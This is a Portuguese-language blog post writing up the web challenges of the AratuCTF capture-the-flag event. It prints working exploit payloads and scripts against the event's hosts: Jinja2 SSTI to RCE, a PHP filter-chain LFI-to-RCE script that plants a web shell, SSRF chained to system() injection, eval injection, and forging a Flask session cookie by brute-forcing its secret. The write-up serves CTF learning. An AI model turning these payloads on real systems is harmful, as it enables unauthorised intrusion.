

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=dark>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="blaidd">
  <meta name="keywords" content="">
  
    <meta name="description" content="IntroduçãoO AratuCTF criado pelo pessoal da comunidade Boitatech ficou no ar durante os dias 10-11 de setembro de 2022. Esse blog post é um writeup simples de todas as challs web com exceção da Pop It">
<meta property="og:type" content="article">
<meta property="og:title" content="AratuCTF Writeup (Web challs only)">
<meta property="og:url" content="https://blaidd.xyz/2022/09/12/aratu_web_write_up/index.html">
<meta property="og:site_name" content="Blaidd&#39;s Blog">
<meta property="og:description" content="IntroduçãoO AratuCTF criado pelo pessoal da comunidade Boitatech ficou no ar durante os dias 10-11 de setembro de 2022. Esse blog post é um writeup simples de todas as challs web com exceção da Pop It">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://blaidd.xyz/img/aratuctf/thumbnail.png">
<meta property="article:published_time" content="2022-09-12T00:00:00.000Z">
<meta property="article:modified_time" content="2022-10-10T19:23:55.068Z">
<meta property="article:author" content="blaidd">
<meta property="article:tag" content="Write-up">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="PT-BR">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://blaidd.xyz/img/aratuctf/thumbnail.png">
  
  
  
  <title>AratuCTF Writeup (Web challs only) - Blaidd&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"blaidd.xyz","root":"/","version":"1.9.3","typing":{"enable":true,"typeSpeed":50,"cursorChar":"|","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 50vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Blaidd&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/aratuctf/banner.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.5)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="AratuCTF Writeup (Web challs only)"></span>
          
        </div>

        
          
  <div class="mt-3">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-author" aria-hidden="true"></i>
        blaidd
      </span>
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-09-12 00:00" pubdate>
          September 12, 2022
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          <!-- compatible with older versions-->
          95 min read
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">AratuCTF Writeup (Web challs only)</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="Introducao"><a href="#Introducao" class="headerlink" title="Introdução"></a>Introdução</h1><p>O AratuCTF criado pelo pessoal da comunidade <a target="_blank" rel="noopener" href="https://discord.com/invite/WtBc6Q7mxD">Boitatech</a> ficou no ar durante os dias 10-11 de setembro de 2022.</p>
<p>Esse blog post é um writeup simples de todas as challs web com exceção da Pop It e da No Longer Poppin (fuck php pop chains).</p>
<h2 id="Whirlwind"><a href="#Whirlwind" class="headerlink" title="Whirlwind"></a>Whirlwind</h2><p>Descrição da chall: “um fenômeno meteorológico que se manifesta como uma coluna de ar fez com que essa aplicação ficasse vulnerável”.<br>Target: <a target="_blank" rel="noopener" href="https://whirlwind.boita.tech/">https://whirlwind.boita.tech/</a></p>
<p>Ao acessar <a target="_blank" rel="noopener" href="https://whirlwind.boita.tech/">https://whirlwind.boita.tech/</a> o servidor retornar uma mensagem falando que falta um parâmetro GET:<br><img src="/img/aratuctf/Pasted image 20220911180353.png" srcset="/img/loading.gif" lazyload /></p>
<p>Fazendo brute force de parâmetros com o x8 encontramos um parâmetro válido:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs bash">blaidd@<span class="hljs-built_in">arch</span>:~$ x8 -u <span class="hljs-string">&quot;https://whirlwind.boita.tech/&quot;</span> -w ~/wordlists/params/medium.txt<br> _________  __ ___     _____<br>|GET https://whirlwind.boita.tech/?%s<br>|Code 200<br>|Response Len 670<br>|Reflections 0<br>|Words 10986<br><br>[<span class="hljs-comment">#] the max number of parameters in every request was increased to 256</span><br>reflects: createuser<br>-&gt;  1/1         <br>Amount of requests: 68<br><br>GET https://whirlwind.boita.tech/ % createuser<br></code></pre></td></tr></table></figure>

<p>Ao tentarmos mandar algum valor no parâmetro “createuser” percebemos que ele reflete o valor:<br><img src="/img/aratuctf/Pasted image 20220911181348.png" srcset="/img/loading.gif" lazyload /></p>
<p>Depois de fazer alguns testes de vulnerabilidades baseadas em reflection, descobrimos que o parâmetro é vulnerável a SSTI com a sintax do jinja2:<br><img src="/img/aratuctf/Pasted image 20220911181607.png" srcset="/img/loading.gif" lazyload /></p>
<p>Explorando a vulnerabilidade conseguimos um RCE e ler a flag:<br><img src="/img/aratuctf/Pasted image 20220911182049.png" srcset="/img/loading.gif" lazyload /></p>
<p>Payload final: <code>https://whirlwind.boita.tech/?createuser=1&#123;&#123;+%27%27.__class__.__mro__[1].__subclasses__()[232](%27cat+/flag.txt%27,shell=True,stdout=-1).communicate()[0].strip()&#125;&#125;</code></p>
<h2 id="inclusive-policy"><a href="#inclusive-policy" class="headerlink" title="inclusive_policy"></a>inclusive_policy</h2><p>Descrição: “This vulnerability looks cool, but where’s RCE?”<br>Target: <a target="_blank" rel="noopener" href="https://inclusive-policy.boita.tech/">https://inclusive-policy.boita.tech/</a></p>
<p>Ao acessar a aplicação ela retorna o source code:<br><img src="/img/aratuctf/Pasted image 20220911184306.png" srcset="/img/loading.gif" lazyload /></p>
<p>Pelo source code podemos facilmente perceber que da pra ler arquivos arbitrários:<br><img src="/img/aratuctf/Pasted image 20220911184648.png" srcset="/img/loading.gif" lazyload /></p>
<p>O include do php executa código, então só precisamos encontrar algum arquivo que podemos escrever e fazer um ataque de poisoning, porém não consegui encontrar nenhum arquivo nessas condições.</p>
<p>Outra maneira de executar código com include é através dos filtros do php, seguindo as instruções do artigo <a target="_blank" rel="noopener" href="https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters">LFI2RCE via PHP Filters</a> conseguimos executar comandos no host:<br><img src="/img/aratuctf/Pasted image 20220911185423.png" srcset="/img/loading.gif" lazyload /></p>
<p>Script depois das adaptações:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests<br><br>url = <span class="hljs-string">&quot;https://inclusive-policy.boita.tech&quot;</span><br>file_to_use = <span class="hljs-string">&quot;/etc/passwd&quot;</span><br>command = <span class="hljs-string">&quot;/getFlag&quot;</span><br><br><span class="hljs-comment">#&lt;?=`$_GET[0]`;;?&gt;</span><br>base64_payload = <span class="hljs-string">&quot;PD89YCRfR0VUWzBdYDs7Pz4&quot;</span><br><br>conversions = &#123;<br>    <span class="hljs-string">&#x27;R&#x27;</span>: <span class="hljs-string">&#x27;convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2&#x27;</span>,<br>    <span class="hljs-string">&#x27;B&#x27;</span>: <span class="hljs-string">&#x27;convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2&#x27;</span>,<br>    <span class="hljs-string">&#x27;C&#x27;</span>: <span class="hljs-string">&#x27;convert.iconv.UTF8.CSISO2022KR&#x27;</span>,<br>    <span class="hljs-string">&#x27;8&#x27;</span>: <span class="hljs-string">&#x27;convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2&#x27;</span>,<br>    <span class="hljs-string">&#x27;9&#x27;</span>: <span class="hljs-string">&#x27;convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB&#x27;</span>,<br>    <span class="hljs-string">&#x27;f&#x27;</span>: <span class="hljs-string">&#x27;convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213&#x27;</span>,<br>    <span class="hljs-string">&#x27;s&#x27;</span>: <span class="hljs-string">&#x27;convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61&#x27;</span>,<br>    <span class="hljs-string">&#x27;z&#x27;</span>: <span class="hljs-string">&#x27;convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS&#x27;</span>,<br>    <span class="hljs-string">&#x27;U&#x27;</span>: <span class="hljs-string">&#x27;convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932&#x27;</span>,<br>    <span class="hljs-string">&#x27;P&#x27;</span>: <span class="hljs-string">&#x27;convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213&#x27;</span>,<br>    <span class="hljs-string">&#x27;V&#x27;</span>: <span class="hljs-string">&#x27;convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5&#x27;</span>,<br>    <span class="hljs-string">&#x27;0&#x27;</span>: <span class="hljs-string">&#x27;convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2&#x27;</span>,<br>    <span class="hljs-string">&#x27;Y&#x27;</span>: <span class="hljs-string">&#x27;convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2&#x27;</span>,<br>    <span class="hljs-string">&#x27;W&#x27;</span>: <span class="hljs-string">&#x27;convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2&#x27;</span>,<br>    <span class="hljs-string">&#x27;d&#x27;</span>: <span class="hljs-string">&#x27;convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2&#x27;</span>,<br>    <span class="hljs-string">&#x27;D&#x27;</span>: <span class="hljs-string">&#x27;convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2&#x27;</span>,<br>    <span class="hljs-string">&#x27;7&#x27;</span>: <span class="hljs-string">&#x27;convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2&#x27;</span>,<br>    <span class="hljs-string">&#x27;4&#x27;</span>: <span class="hljs-string">&#x27;convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2&#x27;</span><br>&#125;<br><br><br><span class="hljs-comment"># generate some garbage base64</span><br>filters = <span class="hljs-string">&quot;convert.iconv.UTF8.CSISO2022KR|&quot;</span><br>filters += <span class="hljs-string">&quot;convert.base64-encode|&quot;</span><br><span class="hljs-comment"># make sure to get rid of any equal signs in both the string we just generated and the rest of the file</span><br>filters += <span class="hljs-string">&quot;convert.iconv.UTF8.UTF7|&quot;</span><br><br><br><span class="hljs-keyword">for</span> c <span class="hljs-keyword">in</span> base64_payload[::-<span class="hljs-number">1</span>]:<br>        filters += conversions[c] + <span class="hljs-string">&quot;|&quot;</span><br>        <span class="hljs-comment"># decode and reencode to get rid of everything that isn&#x27;t valid base64</span><br>        filters += <span class="hljs-string">&quot;convert.base64-decode|&quot;</span><br>        filters += <span class="hljs-string">&quot;convert.base64-encode|&quot;</span><br>        <span class="hljs-comment"># get rid of equal signs</span><br>        filters += <span class="hljs-string">&quot;convert.iconv.UTF8.UTF7|&quot;</span><br><br>filters += <span class="hljs-string">&quot;convert.base64-decode&quot;</span><br><br>final_payload = <span class="hljs-string">f&quot;php://filter/<span class="hljs-subst">&#123;filters&#125;</span>/resource=<span class="hljs-subst">&#123;file_to_use&#125;</span>&quot;</span><br><br>r = requests.get(url, params=&#123;<br>    <span class="hljs-string">&quot;0&quot;</span>: command,<br>    <span class="hljs-string">&quot;action&quot;</span>: <span class="hljs-string">&quot;include&quot;</span>,<br>    <span class="hljs-string">&quot;dumpfile&quot;</span>: final_payload<br>&#125;)<br><br><span class="hljs-built_in">print</span>(r.text)<br></code></pre></td></tr></table></figure>

<h2 id="ToxycUser"><a href="#ToxycUser" class="headerlink" title="ToxycUser"></a>ToxycUser</h2><p>Descrição: “The website is under development, some messages of the developers can be interesting vector of attack.”<br>Target: <a target="_blank" rel="noopener" href="https://toxycuser.boita.tech/">https://toxycuser.boita.tech/</a><br>Source code: <a target="_blank" rel="noopener" href="https://github.com/boitatech/aratu-downloads-public/raw/master/ToxycUser.zip" title="https://github.com/boitatech/aratu-downloads-public/raw/master/ToxycUser.zip">https://github.com/boitatech/aratu-downloads-public/raw/master/ToxycUser.zip</a></p>
<p>Analisando o source code percebemos que o arquivo func.php está vulnerável a function injection:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">exist</span>(<span class="hljs-params"><span class="hljs-variable">$action</span>, <span class="hljs-variable">$id</span></span>) </span>&#123;<br>  <span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$action</span>) || <span class="hljs-keyword">isset</span>(<span class="hljs-variable">$id</span>)) &#123;<br>    <span class="hljs-variable">$action</span>(<span class="hljs-string">&quot;<span class="hljs-subst">$id</span>&quot;</span>); <span class="hljs-comment">//function injection here</span><br>  &#125;<br>&#125;<br><br><br><span class="hljs-keyword">if</span> (<span class="hljs-variable">$action</span>  == <span class="hljs-string">&quot;logs&quot;</span>) &#123; <br>  <span class="hljs-title function_ invoke__">exist</span>(<span class="hljs-variable">$action</span>, <span class="hljs-variable">$id</span>);<br>&#125; <span class="hljs-keyword">elseif</span> (<span class="hljs-variable">$client</span> == <span class="hljs-variable">$server</span>) &#123; <span class="hljs-comment">// localhost only</span><br>  <span class="hljs-title function_ invoke__">exist</span>(<span class="hljs-variable">$action</span>, <span class="hljs-variable">$id</span>);<br>&#125; <span class="hljs-keyword">else</span> &#123;<br>  <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;h1&gt;Apenas pra acesso local!&lt;/h1&gt;&quot;</span>;<br>&#125;<br></code></pre></td></tr></table></figure>
<p>Mas pra controlar a função a ser executadas precisamos enviar a request do localhost :(</p>
<p>Analisando o index.php percebemos que ele está vulnerável a SSRF:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-variable">$url</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&quot;parametrosupersecretors&quot;</span>];<br><br><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$url</span>)) &#123;<br>   <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;br&gt;&quot;</span>;<br>   <span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">file_get_contents</span>(<span class="hljs-string">&quot;http://&quot;</span>.<span class="hljs-variable">$url</span>); <span class="hljs-comment">// SSRF here</span><br>&#125;<br><br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>
<p>Agora é só usar o SSRF pra bypassar o if do localhost do func.php e executar funções arbitrárias do php e conseguir um RCE:<br><img src="/img/aratuctf/Pasted image 20220911191252.png" srcset="/img/loading.gif" lazyload /><br>Payload final: <code>https://toxycuser.boita.tech/?parametrosupersecretors=localhost/func.php?action=system%26id=cat$IFS/flag_SKzdI</code></p>
<h2 id="Sandbox-Baby"><a href="#Sandbox-Baby" class="headerlink" title="Sandbox Baby"></a>Sandbox Baby</h2><p>Descrição: “é só um eval, não pode ser tão difícil assim…”<br>Target: <a target="_blank" rel="noopener" href="https://sandbox-baby.boita.tech/">https://sandbox-baby.boita.tech/</a></p>
<p>Ao acessar o target o servidor retorna o source code da aplicação:<br><img src="/img/aratuctf/Pasted image 20220911202604.png" srcset="/img/loading.gif" lazyload /></p>
<p>Basicamente precisamos fazer um code injection no parâmetro “username” usando apenas os caracteres permitidos pelo regex, existem várias formas de fazer isso.</p>
<p>Meu payload foi <code>https://sandbox-baby.boita.tech/?username=blaidd$&#123;system(array_pop(array_values($_GET)))&#125;&amp;cmd=cat+/this-is-the-ezy-flag-aratu.txt</code><br><img src="/img/aratuctf/Pasted image 20220911202953.png" srcset="/img/loading.gif" lazyload /></p>
<h2 id="F4-Tools-user-x2F-root"><a href="#F4-Tools-user-x2F-root" class="headerlink" title="F4 Tools user&#x2F;root"></a>F4 Tools user&#x2F;root</h2><p>Descrição: “F4 Tools é uma plataforma desenvolvida para armazenar tools. Mostre que existem tools que não estão seguras o suficiente…”<br>Target: <a target="_blank" rel="noopener" href="https://f4tools.boita.tech/login">https://f4tools.boita.tech/login</a></p>
<p>Ao acessar a target url você se depara com uma tela de login onde você pode se registrar e fazer login normalmente:<br><img src="/img/aratuctf/Pasted image 20220911232912.png" srcset="/img/loading.gif" lazyload /><br>Ao fazer login o servidor retorna essa tela:<br><img src="/img/aratuctf/Pasted image 20220911233034.png" srcset="/img/loading.gif" lazyload /><br>Essa tela é um rabbit hole pra te fazer perder tempo, então só ignore…<br>Se você tentar fazer um brute force de diretórios você não irá encontrar nada, mas se você tentar fazer esse mesmo brute force autenticado usando a wordlist common.txt você irá encontrar as seguintes rotas:</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs text">/download - 403<br>/decoder - 403<br>/menu - 200<br></code></pre></td></tr></table></figure>

<p>&#x2F;Menu:<br><img src="/img/aratuctf/Pasted image 20220911234042.png" srcset="/img/loading.gif" lazyload /><br>E ao tentar acessar &#x2F;decoder ou &#x2F;download:<br><img src="/img/aratuctf/Pasted image 20220911234156.png" srcset="/img/loading.gif" lazyload /><br>Se tentarmos fazer um decode no cookie conseguimos perceber que temos o parâmetro “premium”:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">echo</span> <span class="hljs-string">&#x27;eyJwcmVtaXVtIjoiZmFsc2UiLCJ1c2VyIjoiYWRtaW4xIn0.Yx6eUA.bzZ-4OjPJhj79bL6QY6o7Mzo_oE&#x27;</span> | <span class="hljs-built_in">base64</span> -d<br><br>&#123;<span class="hljs-string">&quot;premium&quot;</span>:<span class="hljs-string">&quot;false&quot;</span>,<span class="hljs-string">&quot;user&quot;</span>:<span class="hljs-string">&quot;admin1&quot;</span>&#125;<span class="hljs-built_in">base64</span>: invalid input<br></code></pre></td></tr></table></figure>
<p>Pela minha experiência eu consegui deduzir que era um cookie de sessão do flask (e era mesmo), então eu tentei fazer um brute force do secret que assina a sessão usando <a target="_blank" rel="noopener" href="https://pypi.org/project/flask-unsign/">flask-unsign</a>:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs bash">flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie <span class="hljs-string">&#x27;eyJwcmVtaXVtIjoiZmFsc2UiLCJ1c2VyIjoiYWRtaW4xIn0.YxxBPQ.lFUMhPWzfT7rKckyAoZqM45TwBM&#x27;</span> --no-literal-eval<br><br>[*] Session decodes to: &#123;<span class="hljs-string">&#x27;premium&#x27;</span>: <span class="hljs-string">&#x27;false&#x27;</span>, <span class="hljs-string">&#x27;user&#x27;</span>: <span class="hljs-string">&#x27;admin1&#x27;</span>&#125;<br>[*] Starting brute-forcer with 8 threads..<br>[+] Found secret key after 2304 attempts<br>b<span class="hljs-string">&#x27;mypassword&#x27;</span><br></code></pre></td></tr></table></figure>

<p>Uma vez que temos o secret podemos alterar o parâmetro “premium” pra true e assinar o cookie:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">flask-unsign --sign --cookie <span class="hljs-string">&quot;&#123;&#x27;premium&#x27;: &#x27;true&#x27;, &#x27;user&#x27;: &#x27;admin1&#x27;&#125;&quot;</span> --secret <span class="hljs-string">&#x27;mypassword&#x27;</span><br><br>eyJwcmVtaXVtIjoidHJ1ZSIsInVzZXIiOiJhZG1pbjEifQ.Yx6fDw.EdvXJlkgV0otly5XGqcHn-5IbpY<br></code></pre></td></tr></table></figure>

<p>Agora podemos acessar &#x2F;download que irá fazer o download do script que roda na rota &#x2F;decoder<br>Lendo o source code facilmente podemos identificar uma issue de command injection:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> os; <span class="hljs-keyword">from</span> tkinter <span class="hljs-keyword">import</span> *<br>...<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">decode</span>(<span class="hljs-params">txt</span>):<br>	<span class="hljs-keyword">try</span>:<br>		<span class="hljs-keyword">with</span> os.popen(<span class="hljs-string">f&#x27;echo <span class="hljs-subst">&#123;txt&#125;</span> | base64 -d&#x27;</span>,<span class="hljs-string">&#x27;r&#x27;</span>) <span class="hljs-keyword">as</span> f: result = f.read() <span class="hljs-comment"># command injection here</span><br>	<span class="hljs-keyword">except</span>: result = <span class="hljs-string">&#x27;isso ae nao e base64 nao ilkljkljk&#x27;</span><br><br><span class="hljs-keyword">return</span> result<br>...<br></code></pre></td></tr></table></figure>
<p>Agora só explorar o command injection e pegar as flags de user e root (Não ententi pq separam em 2 flags, n precisei escalar privilégio…):<br><img src="/img/aratuctf/Pasted image 20220912000349.png" srcset="/img/loading.gif" lazyload /><br><img src="/img/aratuctf/Pasted image 20220911235605.png" srcset="/img/loading.gif" lazyload /></p>
